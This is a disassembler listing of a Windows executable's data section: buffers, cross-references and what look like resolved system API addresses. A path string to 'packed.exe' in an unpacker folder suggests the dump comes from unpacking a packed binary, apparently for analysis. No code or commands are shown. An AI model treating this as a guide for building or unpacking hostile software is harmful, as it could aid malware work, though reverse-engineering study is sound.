dword_4345E8 dd 6 dup(0) ; DATA XREF: sub_405DAD+D2�o
; sub_405DAD+13B�o ...
dword_434600 dd 0 ; DATA XREF: sub_405898+82�w
; sub_405898+102�o
dword_434604 dd 41h dup(0) ; DATA XREF: sub_405898+41�o
dword_434708 dd 41h dup(0) ; DATA XREF: sub_405898+63�o
dword_43480C dd 0 ; DATA XREF: sub_405898+F8�w
; sub_405898+114�r
dword_434810 dd 0 ; DATA XREF: sub_405898+52�w
dword_434814 dd 0 ; DATA XREF: sub_405898+4D�w
; sub_405898+CF�r
dword_434818 dd 20h dup(0) ; DATA XREF: sub_405898+9A�o
; sub_405898+BA�o
dword_434898 dd 0 ; DATA XREF: sub_405898+8F�w
dword_43489C dd 0 ; DATA XREF: sub_405898+A7�w
; sub_405898+C7�w
dword_4348A0 dd 0 ; DATA XREF: sub_405898:loc_4059C2�r
align 8
dword_4348A8 dd 0 ; DATA XREF: sub_405898+2D5�w
; sub_405898+32E�o
dword_4348AC dd 0A2h dup(0) ; DATA XREF: sub_405898+2C3�o
dword_434B34 dd 41h dup(0) ; DATA XREF: sub_405898+28D�o
dword_434C38 dd 0 ; DATA XREF: sub_405898+2BA�w
; sub_405898+2E1�r
align 10h
dword_434C40 dd 0 ; DATA XREF: sub_405898+324�w
; sub_405898+340�r
dword_434C44 dd 0 ; DATA XREF: sub_405898+2E7�w
dword_434C48 dd 0 ; DATA XREF: sub_405898+2F4�w
dword_434C4C dd 0 ; DATA XREF: sub_405898+2B4�w
dd 0
dword_434C54 dd 0 ; DATA XREF: sub_405898:loc_405BEE�r
dword_434C58 dd 0 ; DATA XREF: sub_405898+1A1�w
; sub_405898+221�o
dword_434C5C dd 41h dup(0) ; DATA XREF: sub_405898+163�o
dword_434D60 dd 41h dup(0) ; DATA XREF: sub_405898+182�o
dword_434E64 dd 0 ; DATA XREF: sub_405898+217�w
; sub_405898+233�r
dword_434E68 dd 0 ; DATA XREF: sub_405898+171�w
dword_434E6C dd 0 ; DATA XREF: sub_405898+1EE�r
dword_434E70 dd 20h dup(0) ; DATA XREF: sub_405898+1B9�o
; sub_405898+1D9�o
dword_434EF0 dd 0 ; DATA XREF: sub_405898+1AE�w
dword_434EF4 dd 0 ; DATA XREF: sub_405898+1C6�w
; sub_405898+1E6�w
dword_434EF8 dd 0 ; DATA XREF: sub_405898:loc_405AE2�r
align 10h
dword_434F00 dd 0 ; DATA XREF: sub_406E34+F�r
; sub_40702D+12�r
align 8
dword_434F08 dd 80h dup(0) ; DATA XREF: sub_407D4C+41�o
dword_435108 dd 50h dup(0) ; DATA XREF: sub_40767D+C7�o
; sub_4079D8+DD�o ...
db 0
byte_435249 db 3 dup(0) ; DATA XREF: _2:off_4254CC�o
dd 1AFh dup(0)
dword_435908 dd 200h dup(0) ; DATA XREF: sub_40767D+D6�o
; sub_4079D8+F4�o ...
dword_436108 dd 0 ; DATA XREF: sub_40767D+86�w
; sub_40784F+94�r
dword_43610C dd 0 ; DATA XREF: sub_40767D+A7�w
; sub_407CB5+55�r ...
dword_436110 dd 0 ; DATA XREF: sub_40767D+A0�w
; sub_40784F+D6�r ...
dword_436114 dd 0 ; DATA XREF: sub_40767D+79�w
; sub_40784F+35�r ...
dword_436118 dd 80h dup(0) ; DATA XREF: sub_407CB5+5E�o
dword_436318 dd 0 ; DATA XREF: sub_40767D+93�w
; sub_40784F+A2�r
align 10h
dword_436320 dd 0 ; DATA XREF: sub_40767D+E7�o
; sub_40767D+103�r ...
dword_436324 dd 0 ; DATA XREF: sub_4079D8+17B�w
; sub_407B7F+107�w
dword_436328 dd 0 ; DATA XREF: sub_4079D8+180�w
; sub_407B7F+10D�w ...
dword_43632C dd 0 ; DATA XREF: sub_4079D8+159�w
; sub_407CB5+4F�r
dword_436330 dd 77C72C6Bh ; DATA XREF: sub_406BF9+210�r
; sub_406BF9+21A�r ...
dword_436334 dd 77EBA994h ; DATA XREF: sub_407E65+65�w
; sub_4135F8+F5�r
dword_436338 dd 7622A3F4h ; DATA XREF: sub_407E65+7ED�w
; sub_407E65+862�r ...
dword_43633C dd 71C45229h ; DATA XREF: sub_407E65+9BA�w
; sub_407E65+A18�r ...
dword_436340 dd 71C24870h ; DATA XREF: sub_407E65+96C�w
; sub_407E65+9E8�r ...
dword_436344 dd 77C71BB0h ; DATA XREF: sub_406BF9+D1�r
; sub_407E65+46F�w ...
dword_436348 dd 77D4808Bh ; DATA XREF: sub_4023A7+EC�r
; sub_4023A7+109�r ...
dword_43634C dd 71C4502Ch ; DATA XREF: sub_407E65+9AD�w
; sub_407E65+A10�r ...
dword_436350 dd 77DE801Bh ; DATA XREF: sub_407E65+354�w
; sub_407E65+3A9�r ...
dword_436354 dd 77DDACABh ; DATA XREF: sub_407E65+3F1�w
; sub_409F1E+11E�r
dword_436358 dd 77DE8075h ; DATA XREF: sub_407E65+361�w
; sub_407E65+3B1�r ...
dword_43635C dd 77DD7496h ; DATA XREF: sub_407E65+3A2�w
; sub_40C154+AD�r
dword_436360 dd 71AB1B7Bh ; DATA XREF: sub_404138+115�r
; sub_406AF9+7D�r ...
dword_436364 dd 77E686CCh ; DATA XREF: sub_407E65+72�w
; sub_407E65+D2�r ...
dword_436368 dd 71C2498Bh ; DATA XREF: sub_407E65+95F�w
; sub_407E65+9DB�r ...
dword_43636C dd 77DDAB2Fh ; DATA XREF: sub_407E65+388�w
; sub_407E65+3C9�r ...
dword_436370 dd 7620E8C3h ; DATA XREF: sub_407E65+83B�w
; sub_407E65+88E�r ...
dword_436374 dd 77DD23D7h ; DATA XREF: sub_40726C+58�r
; sub_407E65+2A5�w ...
dword_436378 dd 76214750h ; DATA XREF: sub_407E65+82E�w
; sub_407E65+886�r ...
dword_43637C dd 77E6D75Bh ; DATA XREF: sub_407E65+B3�w
dword_436380 dd 7620BD61h ; DATA XREF: sub_407E65+848�w
; sub_407E65+896�r ...
dword_436384 dd 71AB60C9h ; DATA XREF: sub_406224+7E�r
; sub_407E65+52F�w ...
dword_436388 dd 77EBA6E9h ; DATA XREF: sub_407E65+58�w
; sub_407E65+CA�r ...
dword_43638C dd 76D62A58h ; DATA XREF: sub_407E65+916�w
; sub_4095CC+11A�r
dword_436390 dd 76F36EAAh ; DATA XREF: sub_407E65+A66�w
; sub_407E65+A6D�r ...
dword_436394 dd 77E802FCh ; DATA XREF: sub_407E65+A6�w
; sub_407E65+F2�r
dword_436398 dd 77C75455h ; DATA XREF: sub_406BF9+119�r
; sub_407E65+462�w ...
dword_43639C dd 71AB12A7h ; DATA XREF: sub_405C2C+20�r
; sub_407E65+5D8�w ...
dword_4363A0 dd 71C574FAh ; DATA XREF: sub_407E65+9A0�w
; sub_407E65+A08�r
dword_4363A4 dd 71AB1746h ; DATA XREF: sub_402688+280�r
; sub_407E65+5CB�w ...
dword_4363A8 dd 71B28D0Dh ; DATA XREF: sub_407E65+B21�w
dword_4363AC dd 762211EFh ; DATA XREF: sub_407E65+7E0�w
; sub_407E65+84F�r ...
dword_4363B0 dd 77D902E3h ; DATA XREF: sub_407E65+1B3�w
; sub_409266+15�r
dword_4363B4 dd 71C2FA86h ; DATA XREF: sub_407E65+979�w
; sub_407E65+9F0�r ...
dword_4363B8 dd 77DE1291h ; DATA XREF: sub_407E65+36E�w
; sub_407E65+3B9�r ...
dword_4363BC dd 77E2C1B3h ; DATA XREF: sub_407E65+37B�w
; sub_407E65+3C1�r ...
dword_4363C0 dd 73B81E3Bh ; DATA XREF: sub_406E34+28�r
; sub_40702D+2B�r ...
dword_4363C4 dd 71ABF628h ; DATA XREF: sub_407E65+68E�w
; sub_4138EE+D0�r
dword_4363C8 dd 71AB1836h ; DATA XREF: sub_4010B5:loc_4013E0�r
; sub_401A76:loc_401D1C�r ...
dword_4363CC dd 77C72889h ; DATA XREF: sub_406BF9+207�r
; sub_407E65+496�w
dword_4363D0 dd 71C453F8h ; DATA XREF: sub_407E65+9C7�w
; sub_407E65+A20�r ...
dword_4363D4 dd 77DD5C55h ; DATA XREF: sub_407E65+2B2�w
; sub_407E65+2DE�r ...
dword_4363D8 dd 77E96645h ; DATA XREF: sub_407E65+7F�w
; sub_407E65+DA�r ...
dword_4363DC dd 77428B97h ; DATA XREF: sub_407E65+B6E�w
; sub_407E65+B75�r ...
dword_4363E0 dd 71AB41DAh ; DATA XREF: sub_4010B5+2F�r
; sub_401A76+2F�r ...
dword_4363E4 dd 762059A3h ; DATA XREF: sub_407E65+807�w
; sub_407E65+872�r ...
dword_4363E8 dd 71C4A1B4h ; DATA XREF: sub_407E65+986�w
; sub_407E65+9F8�r
dword_4363EC dd 1F7CD214h ; DATA XREF: sub_407E65+BDF�w
; sub_407E65+C10�r
dword_4363F0 dd 77D4456Bh ; DATA XREF: sub_4023A7+40�r
; sub_4023A7+63�r ...
dword_4363F4 dd 76D629BBh ; DATA XREF: sub_407E65+8FC�w
; sub_407E65+910�r ...
dword_4363F8 dd 1F7B9D96h ; DATA XREF: sub_407E65+BF9�w
dword_4363FC dd 71AB1740h ; DATA XREF: sub_4010B5:loc_4013AA�r
; sub_40144A+3C�r ...
dword_436400 dd 7620AFB6h ; DATA XREF: sub_407E65+821�w
; sub_407E65+855�r
dword_436404 dd 77D5C13Ah ; DATA XREF: sub_4023A7+50�r
; sub_4023A7+78�r ...
dword_436408 dd 77D45B19h ; DATA XREF: sub_406E34+3F�r
; sub_406E34+69�r ...
dword_43640C dd 71AB157Eh ; DATA XREF: sub_407E65+65A�w
; sub_407E65+786�r ...
dword_436410 dd 71AB3E5Dh ; DATA XREF: sub_40345C+F2�r
; sub_40513E+62�r ...
dword_436414 dd 71AB14DCh ; DATA XREF: sub_402688+16E�r
; sub_407E65+549�w ...
dword_436418 dd 0CC0004h ; DATA XREF: sub_407E65+8BD�w
; sub_407E65:loc_408740�w ...
dword_43641C dd 77DD590Bh ; DATA XREF: sub_407E65+28B�w
; sub_407E65+2C6�r ...
dword_436420 dd 71ABD755h ; DATA XREF: sub_4063AC+98�r
; sub_407E65+681�w ...
dword_436424 dd 77DF7311h ; DATA XREF: sub_407E65+30F�w
; sub_407E65+323�r ...
dword_436428 dd 77DDA2AFh ; DATA XREF: sub_407E65+395�w
; sub_407E65+3D1�r ...
dword_43642C dd 1F7CD927h ; DATA XREF: sub_407E65+BD2�w
; sub_407E65+C08�r
dword_436430 dd 76206853h ; DATA XREF: sub_407E65+7FA�w
; sub_407E65+86A�r ...
dword_436434 dd 77D4932Ch ; DATA XREF: sub_4023A7+FC�r
; sub_407E65+206�w ...
dword_436438 dd 77D5E310h ; DATA XREF: sub_407E65+18C�w
; sub_407E65+1D2�r ...
dword_43643C dd 76206B7Fh ; DATA XREF: sub_407E65+814�w
; sub_407E65+87A�r ...
dword_436440 dd 71AB1444h ; DATA XREF: sub_40525F+244�r
; sub_407E65+606�w ...
dword_436444 dd 77DD189Ah ; DATA XREF: sub_40726C+18A�r
; sub_407E65+2BF�w ...
dword_436448 dd 71AB3F8Dh ; DATA XREF: sub_4010B5+6F�r
; sub_40144A+AA�r ...
dword_43644C dd 77DD5D20h ; DATA XREF: sub_407E65+302�w
; sub_407E65+316�r ...
dword_436450 dd 71AB1890h ; DATA XREF: sub_404138+F9�r
; sub_40525F+1FC�r ...
dword_436454 dd 77C76B34h ; DATA XREF: sub_406BF9+16�r
; sub_407E65+42E�w ...
dword_436458 dd 77D5E38Ch ; DATA XREF: sub_407E65+199�w
; sub_407E65+1DA�r ...
dword_43645C dd 77DDA20Bh ; DATA XREF: sub_407E65+347�w
; sub_407E65+39C�r ...
dword_436460 dd 76F36EEBh ; DATA XREF: sub_407E65+A73�w
dword_436464 dd 71AB12A7h ; DATA XREF: sub_4010B5+EB�r
; sub_4010B5+1F9�r ...
dword_436468 dd 71AB1746h ; DATA XREF: sub_4010B5+87�r
; sub_4010B5+9D�r ...
dword_43646C dd 77EBA595h ; DATA XREF: sub_407E65+4B�w
; sub_407E65+C2�r ...
dword_436470 dd 77C7531Dh ; DATA XREF: sub_406BF9+2C�r
; sub_406BF9+38�r ...
dword_436474 dd 77D4BDCAh ; DATA XREF: sub_407E65+165�w
; sub_407E65+1BA�r ...
dword_436478 dd 71C3516Ah ; DATA XREF: sub_407E65+9E1�w
; sub_40CA59+72�r
dword_43647C dd 71AB32CAh ; DATA XREF: sub_407E65+667�w
; sub_407E65+78E�r
dword_436480 dd 71AB5690h ; DATA XREF: sub_402688+205�r
; sub_402FC3+75�r ...
dword_436484 dd 1F7CB8F8h ; DATA XREF: sub_407E65+BEC�w
; sub_407E65+C18�r
dword_436488 dd 77EBB1E7h ; DATA XREF: sub_407E65+3E�w
; sub_407E65+BA�r ...
dword_43648C dd 77DD59F0h ; DATA XREF: sub_407E65+298�w
; sub_407E65+2CE�r ...
dword_436490 dd 71AB5DE2h ; DATA XREF: sub_404138+9E�r
; sub_406224+9C�r ...
dword_436494 dd 71AB3ECEh ; DATA XREF: sub_402688+EB�r
; sub_404138+89�r ...
dword_436498 dd 73B81B0Fh ; DATA XREF: sub_407E65+C63�w
; sub_40D2E0+4624�r
dword_43649C dd 76204E4Dh ; DATA XREF: sub_407E65+85B�w
; sub_40A291+205�r ...
dword_4364A0 dd 0 ; DATA XREF: sub_407E65+112�w
dword_4364A4 dd 1F7D886Ah ; DATA XREF: sub_407E65+BB8�w
; sub_407E65+BF3�r
dword_4364A8 dd 71AB12F8h ; DATA XREF: sub_40144A+119�r
; sub_40144A+1A0�r ...
dword_4364AC dd 77C76551h ; DATA XREF: sub_406BF9+BC�r
; sub_407E65+43B�w ...
dword_4364B0 dd 77C729E2h ; DATA XREF: sub_406BF9+FB�r
; sub_407E65+47C�w ...
dword_4364B4 dd 77C7212Fh ; DATA XREF: sub_406BF9+65�r
; sub_407E65+448�w ...
dword_4364B8 dd 71AB1AF4h ; DATA XREF: sub_403042+1B�r
; sub_403042+35�r ...
dword_4364BC dd 77D5E303h ; DATA XREF: sub_407E65+1A6�w
; sub_407E65+1E2�r ...
dword_4364C0 dd 71C4576Ch ; DATA XREF: sub_407E65+9D4�w
; sub_407E65+A28�r ...
dword_4364C4 dd 77D4702Fh ; DATA XREF: sub_406E34+53�r
; sub_406E34+7F�r ...
dword_4364C8 dd 77E6C0E3h ; DATA XREF: sub_407E65+8C�w
; sub_407E65+E2�r ...
dword_4364CC dd 71AB1ED3h ; DATA XREF: sub_4010B5+2C2�r
; sub_40144A+2DA�r ...
dword_4364D0 dd 71B2A381h ; DATA XREF: sub_407E65+B14�w
; sub_407E65+B30�r
dword_4364D4 dd 77DDA595h ; DATA XREF: sub_407E65+31C�w
; sub_41358D+55�r
dword_4364D8 dd 77DD22EAh ; DATA XREF: sub_40726C+3F�r
; sub_407E65+27E�w ...
dword_4364DC dd 773F97B0h ; DATA XREF: sub_407E65+B7B�w
dword_4364E0 dd 76D67A29h ; DATA XREF: sub_407E65+ABD�w
; sub_409448+CE�r
dword_4364E4 dd 76D674FAh ; DATA XREF: sub_407E65+AB0�w
; sub_407E65+AB7�r ...
dword_4364E8 dd 71AB3C22h ; DATA XREF: sub_40144A+2E�r
; sub_401D82+55�r ...
dword_4364EC dd 71AB2BBFh ; DATA XREF: sub_4063AC+88�r
; sub_407E65+674�w ...
dword_4364F0 dd 1F7BA3A9h ; DATA XREF: sub_407E65+BC5�w
; sub_407E65+C00�r
dword_4364F4 dd 71AB401Ch ; DATA XREF: sub_402688+28D�r
; sub_40525F+250�r ...
dword_4364F8 dd 71C214BAh ; DATA XREF: sub_407E65+993�w
; sub_407E65+A00�r ...
dword_4364FC dd 71AB868Dh ; DATA XREF: sub_404138+13A�r
; sub_406224+B3�r ...
dword_436500 dd 71AB1A6Dh ; DATA XREF: sub_4010B5+324�r
; sub_40144A+2F0�r ...
dword_436504 dd 71AB155Ah ; DATA XREF: sub_404138+B7�r
; sub_404138+39F�r ...
dword_436508 dd 71B22C25h ; DATA XREF: sub_407E65+B07�w
; sub_407E65+B28�r
dword_43650C dd 71AB5A01h ; DATA XREF: sub_4010B5+4F�r
; sub_401A76+4F�r ...
dword_436510 dd 71B2ACCBh ; DATA XREF: sub_407E65+AFA�w
; sub_407E65+B1B�r
dword_436514 dd 77E78C17h ; DATA XREF: sub_407E65+31�w
; sub_407E65+AD�r ...
dword_436518 dd 77D49A11h ; DATA XREF: sub_406E34+1EC�r
; sub_40702D+232�r ...
align 10h
dword_436520 dd 76D62A37h ; DATA XREF: sub_407E65+909�w
; sub_407E65+91D�r ...
off_436524 dd offset sub_4DA1C7 ; DATA XREF: sub_407E65+99�w
; sub_407E65+EA�r ...
dword_436528 dd 0 ; DATA XREF: sub_407E65:loc_407F63�w
; sub_407E65+12B�w ...
dword_43652C dd 0 ; DATA XREF: sub_407E65+126�w
; sub_408AF2+1C�r
dword_436530 dd 0 ; DATA XREF: sub_407E65:loc_408053�w
; sub_407E65:loc_4080BA�w ...
dword_436534 dd 0 ; DATA XREF: sub_407E65+250�w
; sub_408AF2+50�r
dword_436538 dd 0 ; DATA XREF: sub_407E65:loc_40814F�w
; sub_407E65:loc_408194�w ...
dword_43653C dd 0 ; DATA XREF: sub_407E65+400�w
; sub_408AF2+84�r
dword_436540 dd 0 ; DATA XREF: sub_407E65:loc_40834B�w
; sub_408AF2:loc_408BA2�r
dword_436544 dd 0 ; DATA XREF: sub_407E65+4E1�w
; sub_408AF2+B8�r
dword_436548 dd 0 ; DATA XREF: sub_407E65:loc_40861C�w
; sub_408AF2:loc_408BD6�r
dword_43654C dd 0 ; DATA XREF: sub_407E65+7B2�w
; sub_408AF2+EC�r
dword_436550 dd 0 ; DATA XREF: sub_407E65:loc_408707�w
; sub_407E65+8D1�w ...
dword_436554 dd 0 ; DATA XREF: sub_407E65+8CC�w
; sub_408AF2+120�r
dword_436558 dd 0 ; DATA XREF: sub_407E65:loc_40879B�w
; sub_408AF2:loc_408C3E�r ...
dword_43655C dd 0 ; DATA XREF: sub_407E65+931�w
; sub_408AF2+154�r
dword_436560 dd 0 ; DATA XREF: sub_407E65:loc_4088A6�w
; sub_408AF2:loc_408C72�r ...
dword_436564 dd 0 ; DATA XREF: sub_407E65+A3C�w
; sub_408AF2+188�r
dword_436568 dd 0 ; DATA XREF: sub_407E65:loc_4088F0�w
; sub_408AF2:loc_408CA6�r
dword_43656C dd 0 ; DATA XREF: sub_407E65+A86�w
; sub_408AF2+1BC�r
dword_436570 dd 0 ; DATA XREF: sub_407E65:loc_40893A�w
; sub_408AF2:loc_408CDA�r
dword_436574 dd 0 ; DATA XREF: sub_407E65+AD0�w
; sub_408AF2+1F0�r
dword_436578 dd 0 ; DATA XREF: sub_407E65:loc_4089AE�w
; sub_408AF2:loc_408D0E�r
dword_43657C dd 0 ; DATA XREF: sub_407E65+B44�w
; sub_408AF2+224�r
dword_436580 dd 0 ; DATA XREF: sub_407E65:loc_4089F8�w
; sub_408AF2:loc_408D42�r
dword_436584 dd 0 ; DATA XREF: sub_407E65+B8E�w
; sub_408AF2+258�r
dword_436588 dd 0 ; DATA XREF: sub_407E65:loc_408A96�w
; sub_408AF2:loc_408D76�r
dword_43658C dd 0 ; DATA XREF: sub_407E65+C2C�w
; sub_408AF2+28C�r
dword_436590 dd 0 ; DATA XREF: sub_407E65:loc_408AE0�w
; sub_408AF2:loc_408DAA�r
dword_436594 dd 0 ; DATA XREF: sub_407E65+C76�w
; sub_408AF2+2C0�r
dword_436598 dd 81h dup(0) ; DATA XREF: sub_40907B+6A�o
dword_43679C dd 5 dup(0) ; DATA XREF: sub_409526+32�o
dword_4367B0 dd 0 ; DATA XREF: sub_40996E:loc_40998F�r
; sub_409A5D+54�r ...
dword_4367B4 dd 0 ; DATA XREF: sub_40996E�r
; sub_409A5D+37�r ...
dword_4367B8 dd 0 ; DATA XREF: sub_40999E+1A�r
; sub_409BB2+83�o
dword_4367BC dd 0 ; DATA XREF: sub_40996E:loc_409982�r
; sub_409BB2+11B�w
dword_4367C0 dd 0Dh dup(0) ; DATA XREF: sub_409A5D+13�o
; sub_409BB2:loc_409CEF�o
dword_4367F4 dd 0 ; DATA XREF: sub_409A5D+CD�r
; sub_409A5D+EC�r ...
dd 0
dword_4367FC dd 0Eh dup(0) ; DATA XREF: sub_409D67+47�o
dword_436834 dd 1000h dup(0) ; DATA XREF: sub_40A5B3+1D�o
; sub_40A653�o ...
dword_43A834 dd 0 ; DATA XREF: sub_40A5B3+13�o
; sub_40A653+E�o ...
dword_43A838 dd 0Eh dup(0) ; DATA XREF: sub_40B62E+F�o
dword_43A870 dd 2 dup(0) ; DATA XREF: sub_40B9B9+C8�o
dword_43A878 dd 17h dup(0) ; DATA XREF: sub_40BCA3:loc_40BDC0�o
; sub_40BCA3+131�o ...
dword_43A8D4 dd 80h dup(0) ; DATA XREF: sub_40CA59+7C�o
; sub_40CA59+A5�o
dword_43AAD4 dd 0 ; DATA XREF: sub_40C01E+45�w
; sub_40C01E+4D�r ...
dword_43AAD8 dd 17h dup(0) ; DATA XREF: sub_40C925:loc_40CA47�o
; sub_40C925+12D�o
dword_43AB34 dd 80h dup(0) ; DATA XREF: sub_40BF5E+4C�o
; sub_40BF5E+7E�o ...
byte_43AD34 db 0 ; DATA XREF: sub_40C01E+29�r
; sub_40C01E+34�w
align 4
dword_43AD38 dd 80h dup(0) ; DATA XREF: sub_40C275+61�o
; sub_40C275+89�o ...
dword_43AF38 dd 82h dup(0) ; DATA XREF: sub_40BB87:loc_40BBBF�o
; sub_40BB87+5B�o
dword_43B140 dd 0 ; DATA XREF: sub_40A4BB+A�o
; sub_40A4BB+44�r ...
dd 5 dup(0)
dword_43B158 dd 0 ; DATA XREF: sub_40A4BB+60�r
; sub_40D2E0+BD6�r
dd 2D9h dup(0)
dword_43BCC0 dd 0 ; DATA XREF: sub_405DAD+A8�r
; sub_40A4BB+2D�o ...
dd 7Fh dup(0)
dword_43BEC0 dd 0 ; DATA XREF: sub_414F2C+41�w
; sub_415067+40�w ...
dword_43BEC4 dd 0 ; DATA XREF: sub_404716+23B�w
; sub_405DAD:loc_405DF4�r ...
dword_43BEC8 dd 0 ; DATA XREF: sub_409BB2+164�w
; sub_414C7E+AE�w ...
dword_43BECC dd 0 ; DATA XREF: sub_402688+E0�w
; sub_404138+7E�w ...
dword_43BED0 dd 0 ; DATA XREF: sub_4063AC+11E�w
; sub_406593+53�r ...
dword_43BED4 dd 0 ; DATA XREF: sub_404716+268�w
; sub_405898+122�w ...
byte_43BED8 db 0 ; DATA XREF: sub_40D000+91�o
; sub_40D2E0+3357�r ...
align 4
dd 261Dh dup(0)
dword_445750 dd 6A2Ch dup(0) ; DATA XREF: _2:off_425C40�o
dword_460000 dd 1A330h dup(0) ; DATA XREF: _4:004D0B4C�o
dword_4C8CC0 dd 1Bh ; DATA XREF: sub_405756:loc_4057C4�r
; sub_40CB17+3A�w ...
align 8
dword_4C8CC8 dd 0 ; DATA XREF: sub_40CB17:loc_40CF12�o
dword_4C8CCC dd 20h dup(0) ; DATA XREF: sub_40CB17+393�o
; sub_40CB17+44C�o ...
dword_4C8D4C dd 10h dup(0) ; DATA XREF: sub_40CB17+3AA�o
; sub_40D2E0+929�o
dword_4C8D8C dd 24h dup(0) ; DATA XREF: sub_40CB17+3C1�o
dword_4C8E1C dd 0 ; DATA XREF: sub_40CB17+3B5�w
; sub_40CB17+463�w ...
dword_4C8E20 dd 0 ; DATA XREF: sub_40CB17+3D4�w
align 10h
dword_4C8E30 dd 0 ; DATA XREF: sub_40D000+72�r
; sub_40D2E0+273�r
align 8
byte_4C8E38 db 0 ; DATA XREF: sub_40D168+28�r
; sub_40D168+30�o
align 4
dword_4C8E3C dd 0 ; DATA XREF: sub_40CB17+400�w
; sub_40CB17+417�r ...
dword_4C8E40 dd 0 ; DATA XREF: sub_40CB17+398�w
; sub_40D2E0+8CA�r
dd 2 dup(0)
dword_4C8E4C dd 0 ; DATA XREF: sub_4138EE+146�r
dd 0
dword_4C8E54 dd 1Bh dup(0) ; DATA XREF: sub_4141D8+8D�o
dword_4C8EC0 dd 0 ; DATA XREF: sub_415174+16�o
; sub_415193+19�o
dword_4C8EC4 dd 68h dup(0) ; DATA XREF: sub_415127+3D�o
dword_4C9064 dd 0 ; DATA XREF: sub_415F19+A�w
dword_4C9068 dd 0 ; DATA XREF: sub_416ACB+5E�r
; sub_416ACB+A4�w
align 10h
word_4C9070 dw 0 ; DATA XREF: sub_416ACB+55�r
; sub_416ACB+9A�o
word_4C9072 dw 0 ; DATA XREF: sub_416ACB+48�r
db 2 dup(0)
word_4C9076 dw 0 ; DATA XREF: sub_416ACB+3B�r
word_4C9078 dw 0 ; DATA XREF: sub_416ACB+2E�r
word_4C907A dw 0 ; DATA XREF: sub_416ACB+21�r
align 10h
dword_4C9080 dd 0 ; DATA XREF: sub_416C8F+3B�r
; sub_416C8F+91�w
dword_4C9084 dd 0 ; DATA XREF: sub_416878+1B9�w
; sub_416E2E:loc_416EAA�w ...
dword_4C9088 dd 0 ; DATA XREF: sub_417919+35�w
; sub_4187D7:loc_418871�w ...
dword_4C908C dd 0 ; DATA XREF: sub_41DFE6+13A�r
dword_4C9090 dd 0A28h ; DATA XREF: _0:00417D56�w
dword_4C9094 dd 501h ; DATA XREF: _0:00417D4D�w
dword_4C9098 dd 5 ; DATA XREF: _0:00417D42�w
dword_4C909C dd 1 ; DATA XREF: _0:00417D34�w
dword_4C90A0 dd 1 ; DATA XREF: sub_40CB17:loc_40CDFA�r
; sub_41D360+91�w
dword_4C90A4 dd 0A70B20h ; DATA XREF: sub_40CB17+2EC�r
; sub_40CB17+30C�r ...
dd 0
dword_4C90AC dd 0A70B48h ; DATA XREF: sub_41D2A7+44�w
; sub_41FECD+9�r ...
dword_4C90B0 dd 0 ; DATA XREF: sub_4205B1+36�r
dword_4C90B4 dd 0 ; DATA XREF: sub_41FECD+16�r
; sub_42029B+4�r ...
dd 0
off_4C90BC dd offset aCM_unpackerPac ; DATA XREF: sub_41D360+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_4C90C4 db 0 ; DATA XREF: sub_417C27+2D�w
; _0:0041DC0C�r
align 4
dword_4C90C8 dd 0 ; DATA XREF: sub_417C27+27�w
dword_4C90CC dd 0 ; DATA XREF: sub_417C27+4�r
; sub_417C27+8B�w
dword_4C90D0 dd 0 ; DATA XREF: _0:00417D88�w
; sub_41D2A7:loc_41D2B9�r ...
align 8
dword_4C90D8 dd 0 ; DATA XREF: sub_417DFA�r sub_417E1F�r ...
dword_4C90DC dd 0 ; DATA XREF: sub_4189C2+37�r
dd 0
dword_4C90E4 dd 0 ; DATA XREF: sub_415D2F�r
; sub_41756F:loc_41768B�r ...
dword_4C90E8 dd 0 ; DATA XREF: sub_418C74�r
dword_4C90EC dd 0 ; DATA XREF: sub_419B42+4B�w
; sub_419C5B+2D�w ...
dword_4C90F0 dd 0 ; DATA XREF: sub_41AA8D+11�r
; sub_41AB91+1A�r ...
byte_4C90F4 db 0 ; DATA XREF: sub_41AA8D+3�r
; sub_41AA8D+98�r ...
align 4
dword_4C90F8 dd 0 ; DATA XREF: sub_41AB91+11�r
; sub_41AC6F+21�w ...
byte_4C90FC db 0 ; DATA XREF: sub_41AC6F+51�w
align 10h
dword_4C9100 dd 0 ; DATA XREF: sub_41AE65+4E�r
; sub_41B240+3A�r ...
dword_4C9104 dd 0 ; DATA XREF: sub_41AE65+5C�r
; sub_41B240+43�r ...
dword_4C9108 dd 0 ; DATA XREF: sub_4161A2+7A�r
; sub_41B00C+5�r
dword_4C910C dd 0 ; DATA XREF: sub_41B61C+29�r
dword_4C9110 dd 1 ; DATA XREF: sub_41C829+28�r
; sub_41C829+4C�w ...
dd 2 dup(0)
dword_4C911C dd 0 ; DATA XREF: sub_417183+4�r
; sub_417183+6E�r ...
dd 3 dup(0)
dword_4C912C dd 0 ; DATA XREF: sub_417AD9+61�r
; sub_417AD9+BF�r ...
dd 0
dword_4C9134 dd 1 ; DATA XREF: sub_41CA4D:loc_41CBC8�r
; sub_41CBE6+4�w ...
dword_4C9138 dd 0 ; DATA XREF: sub_41D0CB+3A�r
; sub_41D0CB+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_41D360:loc_41D377�o
; _2:off_4C90BC�o
align 4
dd 3Ah dup(0)
dword_4C9240 dd 1 ; DATA XREF: sub_41D5AD+2�r
; sub_41D5AD+23�w ...
dword_4C9244 dd 0 ; DATA XREF: sub_41D96C+21�r
dword_4C9248 dd 0 ; DATA XREF: sub_4189C2:loc_4189EB�w
; sub_418A8C+154�w ...
dword_4C924C dd 1 ; DATA XREF: sub_41DC83+26�r
; sub_41DC83:loc_41DCED�w
dword_4C9250 dd 0 ; DATA XREF: sub_418A8C+7�r
align 8
word_4C9258 dw 0 ; DATA XREF: sub_41E86B+1A�o
; sub_41E86B+46�r
byte_4C925A db 0 ; DATA XREF: sub_41E86B+39�r
align 4
dword_4C925C dd 7 dup(0) ; DATA XREF: sub_41E86B+52�o
dword_4C9278 dd 0 ; DATA XREF: sub_41E86B+40�w
; sub_41E86B+5C�o
dword_4C927C dd 0 ; DATA XREF: sub_41E86B+4D�w
dword_4C9280 dd 0 ; DATA XREF: sub_41E86B+31�w
dword_4C9284 dd 0 ; DATA XREF: sub_41E86B+52�w
dword_4C9288 dd 77C26E79h ; DATA XREF: sub_41E98E:loc_41E9B1�r
; sub_41E98E+38�r ...
align 10h
dword_4C9290 dd 0 ; DATA XREF: sub_41EBF2+11�w
; sub_41EBF2+63�w ...
align 8
dword_4C9298 dd 0 ; DATA XREF: sub_41EBF2+33�o
; sub_41EBF2+46�r
dword_4C929C dd 10h dup(0) ; DATA XREF: sub_41EBF2+C1�o
word_4C92DC dw 0 ; DATA XREF: sub_41EE50+A8�r
